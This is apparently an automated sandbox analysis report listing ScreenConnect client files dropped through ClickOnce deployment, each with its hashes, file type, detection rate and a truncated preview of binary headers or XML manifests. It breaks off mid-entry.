                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............."... ...@....... ..............................|.....@..................................!..O....@.......................`.......!..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......po..,.................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....f...s....%.,...(...+*vs....%.}P.........s....(....*....0..&........s....}.....s....}...........}....s.......}R......{R...(#.....}Q.....}.....(....&.(&..........s....o.....(&...~-...%-.&~+.....g...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s:...}....... ..6........s....s:...}.....($..

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll.genman

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1632
                                                                                                                  Entropy (8bit):5.078428016255135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AK+vSkcyMkcbEMkcuMkcVSkcf5bdTo:3FYZ8h9o9gI0AKCHMkTMk3MkGAXTo
                                                                                                                  MD5:3294B09FFFB0EA1FCBB0B44799C75776
                                                                                                                  SHA1:AFC7CE588221E3FBBDF7B142E8D4C73806E56418
                                                                                                                  SHA-256:F49056A4115510EB50556BA47925E004555385398BE212081986F2B8A9E771AB
                                                                                                                  SHA-512:5E7630B507309223C1BBD217E14C9576081A58DAB1FF09E7C62ABCC064CA7B4FE06EEE81AF60C156D9308E8A21FFA918429D36DC9BE44D91BFFEC99CBCFEC1B1
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):95512
                                                                                                                  Entropy (8bit):6.50433047723113
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMB7eh:BhbNDxZGXfdHrX7rAc6myJkgoU0HK0
                                                                                                                  MD5:D3E628C507DC331BAB3DE1178088C978
                                                                                                                  SHA1:723D51AF347D333F89A6213714EF6540520A55C9
                                                                                                                  SHA-256:EA1CFAD9596A150BEB04E81F84FA68F1AF8905847503773570C901167BE8BF39
                                                                                                                  SHA-512:4B456466D1B60CDA91A2AAB7CB26BB0A63AAA4879522CB5D00414E54F6D2D8D71668B9E34DFF1575CC5B4C92C61B9989ABBE4B56A3E7869A41EFCC45D23CA966
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................#N....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):549888
                                                                                                                  Entropy (8bit):6.035933098806984
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:JL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquqwMSRq/sreR:JLMhOeM52aBFcTbkdpRL6Ei
                                                                                                                  MD5:665A8C1E8BA78F0953BC87F0521905CC
                                                                                                                  SHA1:FE15E77E0AEF283CED5AFE77B8AECADC27FC86CF
                                                                                                                  SHA-256:8377A87625C04CA5D511CEEC91B8C029F9901079ABF62CF29CF1134C99FA2662
                                                                                                                  SHA-512:0F9257A9C51EB92435ED4D45E2EAAA0E2F12983F6912F6542CC215709AE853364D881F184687610F88332ECA0F47E85FA339ADE6B2D7F0F65ADB5E3236A7B774
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0..\..........Bv... ........... ....................................@..................................u..O.......t...........................Pu..8............................................ ............... ..H............text...PZ... ...\.................. ..`.rsrc...t............^..............@..@.reloc...............b..............@..B................!v......H........C..41...................t........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll.genman

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1215
                                                                                                                  Entropy (8bit):5.130185100833224
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0AOvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AyGVETDTo
                                                                                                                  MD5:C1725D95495640E20CCBB09A196AC383
                                                                                                                  SHA1:9A37BC510C15C6810A9DFF641783ECA704172263
                                                                                                                  SHA-256:C0083D1E414DD476B5DC61382A5B0DF2048ED14845C5F235008A106F80828E5D
                                                                                                                  SHA-512:71D37886EB6FE7D0E9DC430A816ED53F962A21CD26189CF98CF48A5CA90EC415C72CA80649EDFEAA0556D9935EE82829425E9CAA4968F8C3EA370BC504C7ECF3
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1726976
                                                                                                                  Entropy (8bit):6.6400445410513145
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:aOgPFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:PgPJkGYYpT0+TFiH7efP
                                                                                                                  MD5:7099C67FE850D902106C03D07BFB773B
                                                                                                                  SHA1:F597D519A59A5FD809E8A1E097FDD6E0077F72DE
                                                                                                                  SHA-256:2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
                                                                                                                  SHA-512:17849CB444D3AC2CD4658D4ECA9DC89652BEAE6C6A2BD765749D8BA53E37248FD92A00AF2B45371C21182135FFFA6DD96DC9570BFD41459F23E084C3E122D162
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=..........." ..0..R...........q... ........... ....................................@..................................p..O.......|............................p..8............................................ ............... ..H............text....Q... ...R.................. ..`.rsrc...|............T..............@..@.reloc...............X..............@..B.................p......H.......................d...0....o........................................(+...*^.(+..........%...}....*:.(+.....}....*:.(+.....}....*:.(+.....}....*..s,...*..s-...*:.(......(/...*..{0...*"..}0...*J.(1........(2...&*:.(......(3...*..{4...*"..}4...*.0..(........(5......+.............(2...&..X....i2.*v.(.....s6...}.....s7...}....*v.{.....r...p(...+.....o9....*.0...........o:....+..o;......(...+&.o....-....,..o......*..........."........{..........o<...&.......(.....*....0..L...

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll.genman

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1980
                                                                                                                  Entropy (8bit):5.056932816447632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AMvSkcyMkcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AgHMkGQAXRTFgTo
                                                                                                                  MD5:58503CF055B0CCE20796B9F1C98BEF88
                                                                                                                  SHA1:08608C9962C02380E78B8CEB0882FD12CC85AFDF
                                                                                                                  SHA-256:13D2921CC2CCC0DA6EAB2EFA06E7C9A4DEAE079169EB1B198D61838AB7AE61E7
                                                                                                                  SHA-512:1BF0515D9618E84C3BE8E935605F3BEF835732C3B89BEF973F160C73B990CB1E6D93CC2D547E89E986FD0F7B28CDE2EBA0B830830DEA3F067242D723C84CA84E
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61208
                                                                                                                  Entropy (8bit):6.323262945280686
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Eyot+ktY7OUZXPGQWvmDtyQXIE+TCBAIfXWbOx79+6:EyYtxURPG0yQVNNxD
                                                                                                                  MD5:E34E8690E53141EE6914238252FA9988
                                                                                                                  SHA1:B772AEF5386F2D688B249935F13BB430C5088FA9
                                                                                                                  SHA-256:BBE9AE87E2DBA00C5E2F78DC742608862D03F72246669C7FCB01C5646A6DF10B
                                                                                                                  SHA-512:06A64527EB281FE5241A7B43BCCBBA9983F05712ED9719D5720062B88731801EACEC66C0D326E57D93D1E526FB29B432F65D50E500AF7DBF53DC5FDC5145C479
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|............"...0.............^.... ........@.. ....................... ............@.....................................O....... ................)..........P...8............................................ ............... ..H............text...d.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................=.......H........S................................................................(....*^.(.......b...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s"...o(...%~....o)...}......(....o*...o+....(,.....A...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):602392
                                                                                                                  Entropy (8bit):6.179559387432912
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:EyB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKij414Sc4q2/R4IEyCui5ASE:/B4KsgqyUuiXrveKtaa3CSaq
                                                                                                                  MD5:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                  SHA1:6D92666AE52761AD1E6C5FBB8E1355354516BED7
                                                                                                                  SHA-256:08EFE3E41BD508E2E9C3F8CF4D466CB1C96C35C1B463E79F2A24AC031AB79B48
                                                                                                                  SHA-512:D9D17361CB3C24F640086EFD97F42B15B642917898879710D35B58F8F746B51936518FBDE1F1FB45C1D524BCBEBA74B4CBDE7F32308AF8CC7A8149A6EEDE18F2
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`......2.....@.................................Q...O.... ...................)...@..........8............................................ ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........I..<...................(.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe.genman

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2569
                                                                                                                  Entropy (8bit):5.024000338224721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0A/HMkAXQ3MkTMkRGTDBTo:1YiW4AUlvpM
                                                                                                                  MD5:EF19EB1F6867FB2EAC046091B1343338
                                                                                                                  SHA1:7C830489E94A67FB5F17E78D364A92B22C3600F7
                                                                                                                  SHA-256:89132764325B05F53BC198F7A5474932AE1CC6BB637821840A45297AA63A8CFB
                                                                                                                  SHA-512:4C299B71BDF5FDE04A2DFCECB7F8428D6C8535C04C78D975EDCC91CFA7DE95B0AB16F110F44F53DBB30B008B9B0B31FC30BB607AA068CF237EFE5C342CAD6695
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):17858
                                                                                                                  Entropy (8bit):5.956106251442279
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:NeE6JrTpGaaXhf6DVuX9IW21X9FX9R/QPIYM7Y7:Nf6DVuX9IWIX9FX9R/QPIN07
                                                                                                                  MD5:59009C4F246E6528BA70C6F65EE5DD0C
                                                                                                                  SHA1:2DD1D0898E3E098DF45854CCBE5DF617DCC122F8
                                                                                                                  SHA-256:E272B0496A6350E84FC34140476F9EF1BF51612ABCBF6014C3CA07E0ABE12EA1
                                                                                                                  SHA-512:898C97567B23FD391508B5C3DACA1BB13E599FAE97FFE262B6EC857070EE1C1A36691CC89F2A66D2C310D50D56FB21A483D3220A25F288F2EBB55E7A1A4F8F07
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.4.9118" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.4.9118" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):81688
                                                                                                                  Entropy (8bit):5.862062649096442
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:htyQl44XzbVI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7co798g:iOZukLdooP
                                                                                                                  MD5:8531526B6F151A08AD8A551611F686D3
                                                                                                                  SHA1:D4A6ABD7256F7624953992ECFE9C6EFBF2529180
                                                                                                                  SHA-256:1BBBE38D4F1193B0AE098BF1BDCE00761EDCD555D0D77F2A33DA6D271FAE4BF0
                                                                                                                  SHA-512:5F5BD79A25ABD20F4E74E128E801C3B852AEDBC4DA0F7A9F8CC72496564010115BC1A098D929597128C757286024B372E2DFFBE5BE6A562F921D70C7F0B81283
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>............."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1366499904-3779542990-1865374188-1001\932a2db58c237abd381d22df4c63a04a_72b7a154-2689-4eb9-b5bb-c54d7ffd1496

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):87
                                                                                                                  Entropy (8bit):3.463057265798253
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                  MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                  SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                  SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                  SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                  Malicious:false
                                                                                                                  Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                  C:\Windows\System32\user.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
